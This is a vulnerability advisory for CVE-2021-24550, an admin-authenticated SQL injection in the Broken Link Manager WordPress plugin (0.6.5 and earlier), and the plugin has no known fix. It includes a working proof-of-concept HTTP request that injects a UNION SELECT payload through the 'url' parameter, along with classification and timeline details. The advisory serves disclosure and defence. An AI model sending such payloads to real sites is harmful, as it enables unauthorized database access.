WordPress Plugin Vulnerabilities

Broken Link Manager <= 0.6.5 - Authenticated (admin+) SQL Injection

Description

The plugin does not sanitise, validate or escape the url GET parameter before using it in a SQL statement when retrieving an URL to edit, leading to an authenticated SQL injection issue

Proof of Concept

GET /wp-admin/admin.php?page=wblm-edit-url&url=-4966%20UNION%20ALL%20SELECT%20NULL,current_user(),current_user(),NULL,NULL,NULL,NULL-- HTTP/1.1
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9
Cookie: [admin+]
Connection: close

Affects Plugins

Plugin icon
broken-link-manager
No known fix

References

CVE
CVE-2021-24550
URL
https://codevigilant.com/disclosure/2021/wp-plugin-broken-link-manager/

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
5.5 (medium)

Miscellaneous

Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes
WPVDB ID
1bf65448-689c-474d-a566-c9b6797d3e4a

Timeline

Publicly Published
2021-07-24 (about 2 years ago)
Added
2021-07-24 (about 2 years ago)
Last Updated
2022-02-24 (about 1 years ago)

Other

Published
Title
Published
2014-08-01
Title
WP Bannerize <= 2.8.7 - SQL Injection
Published
2021-12-14
Title
All In One SEO < 4.1.5.3 - Authenticated SQL Injection
Published
2014-08-01
Title
A to Z Category Listing <= 1.3 - SQL Injection
Published
2014-11-25
Title
Google Document Embedder <= 2.5.14 - SQL Injection
Published
2023-05-22
Title
SupportCandy < 3.1.7 - Subscriber+ SQLi